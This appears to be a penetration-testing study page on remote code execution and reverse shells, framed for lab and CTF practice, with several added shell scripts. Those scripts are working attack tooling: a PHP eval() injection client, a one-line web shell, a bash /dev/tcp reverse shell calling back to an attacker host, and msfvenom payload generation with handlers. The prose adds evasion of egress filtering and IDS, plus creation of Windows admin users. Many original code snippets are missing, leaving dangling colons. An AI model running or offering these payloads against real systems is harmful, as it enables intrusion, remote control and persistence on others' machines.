Remote code execution
Remote code execution (RCE) means an attacker runs code or commands of their choosing on a system they can reach over the network. Code injection (feeding attacker input into something like PHP's eval()) and command injection (passing input through to a shell) are the two common routes to it, and the terms are often used loosely as synonyms for RCE. Often this means exploiting a web application/server to run comma
The following PHP snippet takes the GET parameter code and runs it through the eval() function without any input sanitization:
The eval() function evaluates its argument as PHP code, which means any PHP we supply in the parameter is executed by the web server. The code injection would look like this:
You might also be able to execute system commands with system('id'); which prints the command's output straight into the response. shell_exec() runs the command as well but returns the output as a string instead of printing it, so wrap it in echo to see it; it is the better choice when you want the complete, multi-line output of a command:
This method is useful for both system enumeration and shell injection. Make sure to use absolute paths for binaries (e.g. /bin/ls rather than ls), because the web server process may run with a restricted PATH and fail to find them.
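As an added example (not code from the original page), here is a lab version of what the text describes: vuln.php reconstructs the eval() snippet from the description above, and a small POSIX shell client drives it. The target URL, the file path and the payloads are assumptions. The helper percent-encodes every byte of the PHP statement so quotes, spaces and ; survive the query string, and the run section shows the phpinfo(), system() and shell_exec() cases with absolute paths.

```shell
#!/bin/sh
# Added example, not from the original page. TARGET and the lab file path
# are assumptions; vuln.php reconstructs the eval() snippet the text describes.
TARGET="${TARGET:-http://10.10.10.10/vuln.php}"

# The vulnerable page: whatever arrives in ?code= is handed to eval().
# Write it only into the web root of a lab box you own.
write_vuln_php() {
  cat > "$1" <<'EOF'
<?php
// Deliberately vulnerable: the attacker controls the PHP that runs here.
eval($_GET['code']);
EOF
}

# Percent-encode every byte so quotes, spaces, ';' and '&' survive the
# query string (over-encoding is harmless, PHP decodes it all).
urlencode() {
  printf '%s' "$1" | od -A n -v -t x1 | tr -d ' \n' | sed 's/../%&/g'
}

# Build the injection URL for one PHP statement.
php_eval_url() {
  printf '%s?code=%s' "$TARGET" "$(urlencode "$1")"
}

# Send the statement through eval() and print whatever the page returns.
php_eval() {
  curl -s "$(php_eval_url "$1")"
}

if [ "${1:-}" = "run" ]; then
  php_eval 'phpinfo();'                     # proves code execution (and leaks config)
  php_eval "system('id');"                  # system() prints the output itself
  # shell_exec() returns the output, so echo it; absolute paths because the
  # web server's PATH may not include the directories you expect.
  php_eval "echo shell_exec('/usr/bin/id; /bin/ls -la /var/www');"
fi
```

Run it as sh exploit.sh run with TARGET pointing at the lab box; write_vuln_php only exists so you can stand the vulnerable page up yourself and see the three payloads behave differently.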
For most lab or CTF environments, the goal is to get some kind of command shell on the machine for further exploitation. Sometimes this simply means discovering SSH or remote desktop credentials and logging in. Other times, it's exploiting a web application to generate a reverse shell that connects to your attack machine and waits for instructions.
In real life I'm not sure how often reverse shells really happen, but they're fun to pull off in the lab.
If shells are a new concept, this is a good primer.
Your attack machine needs to have a listener running to catch a reverse shell connection. Make sure you specify the IP address of your attack machine and use a port that doesn't already have a service listening. If you need to use python SimpleHTTPServer (python -m http.server on Python 3) or similar to transfer exploits, make sure that isn't running on the same port.
Using port 80 or 443 will often get you past egress filtering, since outbound HTTP/HTTPS is usually allowed:
You may prefer a Meterpreter listener if you're connecting to a Windows machine and want to take advantage of commands like getsystem, or you want to use local Metasploit exploits once you've connected to the remote machine.
Avoid using port 4444 since it is Metasploit's default LPORT and widely recognized as such by defenders and IDS signatures:
Assuming you are able to put a file on the web server or edit an existing one (e.g. a CMS template), this is the simplest type of shell:
You can use it for system commands:
You can also use it to create a reverse shell:
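The listener and web-shell steps above, as one added example that is not code from the original page: it writes the classic one-line PHP web shell (assumed to be the "simplest type of shell" meant above), drives it with curl, checks that the chosen port is actually free before starting netcat, and sends the bash connect-back one-liner through the web shell. The attacker IP, port and web-shell URL are lab assumptions.

```shell
#!/bin/sh
# Added example, not from the original page. The attacker IP/port and the
# web-shell URL are lab assumptions; adjust before use.
LHOST="${LHOST:-10.10.14.5}"
LPORT="${LPORT:-443}"
WEBSHELL="${WEBSHELL:-http://10.10.10.10/shell.php}"

# The classic one-line PHP web shell (assumed to be the "simplest type of
# shell" the text means): shell.php?cmd=... runs cmd and prints its output.
write_webshell() {
  printf '%s\n' "<?php system(\$_GET['cmd']); ?>" > "$1"
}

# Percent-encode every byte so spaces, quotes, ';' and '&' reach the shell intact.
urlencode() {
  printf '%s' "$1" | od -A n -v -t x1 | tr -d ' \n' | sed 's/../%&/g'
}

# Run one command through the web shell and print the response.
ws() {
  curl -s "$WEBSHELL?cmd=$(urlencode "$1")"
}

# Connect-back one-liner for the target: bash opens a TCP socket to
# LHOST:LPORT (bash's /dev/tcp, so the target needs bash) and wires the
# interactive shell's stdin/stdout/stderr to it.
revshell_cmd() {
  printf "bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'" "$1" "$2"
}

# True when nothing is already listening on the port (catches the classic
# mistake of a python -m http.server left on the same port).
port_free() {
  ! { ss -ltn 2>/dev/null || netstat -ltn 2>/dev/null; } | grep -q ":$1[[:space:]]"
}

# Attacker side: check the port, then listen. Run this in one terminal...
listen() {
  port_free "$LPORT" || { echo "port $LPORT already has a listener" >&2; return 1; }
  nc -nlvp "$LPORT"
}

# ...and trigger the connect-back from another. The request never returns
# while the shell is alive, so give curl a short timeout.
trigger() {
  curl -s -m 5 "$WEBSHELL?cmd=$(urlencode "$(revshell_cmd "$LHOST" "$LPORT")")" >/dev/null
}

case "${1:-}" in
  listen)  listen ;;
  trigger) ws 'id'; trigger ;;   # confirm command execution, then connect back
esac
```

Use sh shell.sh listen in one terminal and sh shell.sh trigger in another; the id output from ws confirms the web shell works before you commit to the reverse shell.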
This PHP web shell from pentestmonkey is nice. Make sure to change the following variables before uploading:
As with the PHP shell, change the following variables in your Perl shell:
I rarely use Perl shells. One time, I tried to call a Perl reverse shell in the filesystem using this web server exploit. The reverse shell didn't fire with a .pl extension, but worked fine when I used a .cgi extension. Setting correct permissions using chmod 755 [file] may have also helped.
If you're able to access a Tomcat server's management interface, you can generate and upload a WAR file:
You can fire the shell by clicking on the link in Tomcat's management interface, or by going to the appropriate URL (e.g. http://[host]/shell/; the path is taken from the WAR file's name).
Meterpreter is good for catching Windows shells, but it's good to practice doing them manually (e.g. because OSCP restricts Metasploit use). You can use msfvenom to generate a non-staged payload that can be caught by a netcat listener:
A non-staged (stageless) payload contains the whole shell and connects back in one go, which is why a plain netcat listener can catch it. A staged payload contains only a small stager that connects back and expects the handler to send the rest of the payload (the stage) over that connection; netcat doesn't know how to do that, so Metasploit's handler is needed.
To create a staged payload and catch the shell using Metasploit's exploit/multi/handler:
Apparently exploit/multi/handler is allowed on the OSCP exam, but this isn't much of an advantage if you can't use Meterpreter or Metasploit's local exploits. But if you don't have a lot of space for the payload, staging it is an option, since the stager is much smaller than the full payload.
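As an added example (not code from the original page), this script makes the staged/non-staged distinction mechanical: it recognises the payload type from Metasploit's naming convention (a / between stage and stager for staged payloads, an _ for non-staged ones), generates the executable with msfvenom, and prints the matching catcher, netcat or exploit/multi/handler. LHOST and LPORT are lab assumptions, and the type check is a heuristic on the name rather than a query of msfvenom.

```shell
#!/bin/sh
# Added example, not from the original page. LHOST/LPORT are lab assumptions.
LHOST="${LHOST:-10.10.14.5}"
LPORT="${LPORT:-443}"

# Metasploit's naming convention tells the two apart: a staged payload has a
# '/' between the stage and the stager (windows/shell/reverse_tcp,
# linux/x86/meterpreter/reverse_tcp); a non-staged one joins them with '_'
# (windows/shell_reverse_tcp, windows/x64/meterpreter_reverse_https).
# This is a heuristic on the name, not a query of msfvenom.
payload_is_staged() {
  stager="${1##*/}"          # last element, e.g. reverse_tcp or shell_reverse_tcp
  rest="${1%/*}"
  stage="${rest##*/}"        # element before it, e.g. shell or meterpreter
  case "$stager" in
    reverse_*|bind_*)
      case "$stage" in
        shell|meterpreter|vncinject|dllinject|upexec) return 0 ;;
      esac ;;
  esac
  return 1
}

# Generate the payload file; -f exe by default, -f aspx or -f war for the
# IIS and Tomcat cases described on this page.
gen_payload() {
  msfvenom -p "$1" LHOST="$LHOST" LPORT="$LPORT" -f "${3:-exe}" -o "$2"
}

# The catcher has to match: netcat for non-staged, multi/handler for staged
# (the handler must send the second stage, which netcat cannot do).
catcher_cmd() {
  if payload_is_staged "$1"; then
    printf 'msfconsole -q -x "use exploit/multi/handler; set payload %s; set LHOST %s; set LPORT %s; exploit"' \
      "$1" "$LHOST" "$LPORT"
  else
    printf 'nc -nlvp %s' "$LPORT"
  fi
}

if [ "${1:-}" = "run" ]; then
  P="${2:-windows/shell_reverse_tcp}"
  gen_payload "$P" shell.exe
  echo "catch it with: $(catcher_cmd "$P")"
fi
```

sh payload.sh run windows/shell/reverse_tcp prints the multi/handler line; the default windows/shell_reverse_tcp prints the netcat line. Pairing a staged payload with netcat is the usual reason a shell "connects and then dies".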
You will use this line pretty often to upgrade a dumb reverse shell to a proper PTY:
To improve the shell further, use Ctrl + Z to background the reverse shell, then on your local machine run:
Then type reset and hit Enter for a fully interactive reverse shell (tab completion, Ctrl + C without killing the shell, and editors such as vi all work).
If the shell dimensions are wrong, background the reverse shell again with Ctrl + Z, go to your local machine and run:
This should return two numbers, which are the number of rows and columns in your terminal. Assuming these numbers are 48 120, return to your victim machine's shell and run:
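The whole upgrade sequence in one place, as an added example that is not code from the original page: the comments mark which side each step runs on, and the helper turns the local stty size output into the stty rows/columns line so the numbers are never typed by hand. The python pty line is assumed to be the "fix your shells" line referred to above.

```shell
#!/bin/sh
# Added example, not from the original page. The comments give the full
# upgrade sequence (which side each step runs on); only the helper at the
# bottom runs locally as a script. The python pty line is assumed to be
# the "fix your shells" line the text refers to.

# --- 1. victim side, inside the dumb reverse shell: get a PTY ---
#   python3 -c 'import pty; pty.spawn("/bin/bash")'
#   (python -c '...' on boxes that only have Python 2)
#   Ctrl+Z                         # suspend the reverse shell
# --- 2. attacker side ---
#   stty raw -echo; fg             # stop the local terminal interpreting keys, resume
#   reset                          # redraws the garbled screen; then press Enter
#   stty size                      # e.g. "48 120" = rows columns
# --- 3. victim side ---
#   export TERM=xterm
#   stty rows 48 columns 120       # the line stty_fix_cmd builds below

# Turn "stty size" output (rows, then columns) into the command for the
# victim. Pass the string explicitly, or let it read the local terminal.
stty_fix_cmd() {
  size="${1:-$(stty size 2>/dev/null)}"
  rows="${size%% *}"
  cols="${size##* }"
  case "$size" in
    *' '*) ;;                                  # must be two fields
    *) echo "cannot determine terminal size from '$size'" >&2; return 1 ;;
  esac
  case "$rows$cols" in
    ''|*[!0-9]*) echo "bad terminal size '$size'" >&2; return 1 ;;
  esac
  if [ "$rows" -eq 0 ] || [ "$cols" -eq 0 ]; then   # "0 0" means no real tty
    echo "no tty attached" >&2; return 1
  fi
  printf 'stty rows %s columns %s' "$rows" "$cols"
}

# Attacker side: print what to paste into the victim shell after step 2.
if [ "${1:-}" = "run" ]; then
  echo "export TERM=xterm; $(stty_fix_cmd)"
fi
```

Run sh upgrade.sh run in the attacker terminal after stty raw -echo; fg and paste the printed line into the victim shell; it refuses to emit a line when it cannot read a real terminal size, which is what happens if you run it from a non-interactive session.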
Windows is a little weird. If you encounter an IIS server, you can use msfvenom to create an .asp or .aspx payload, as described above. You can also attempt to upload nc.exe (remember to set binary mode if you use FTP), then run:
You can download nc.exe from here.
If RDP is enabled (port 3389), you might be able to create a user and add them to the "Remote Desktop Users" group, then log in via remote desktop.
Add a user on Windows:
Add a user to the "Remote Desktop Users" group:
Make a user an Administrator:
Disable the Windows firewall on newer versions of Windows:
Disable the Windows firewall on older versions of Windows: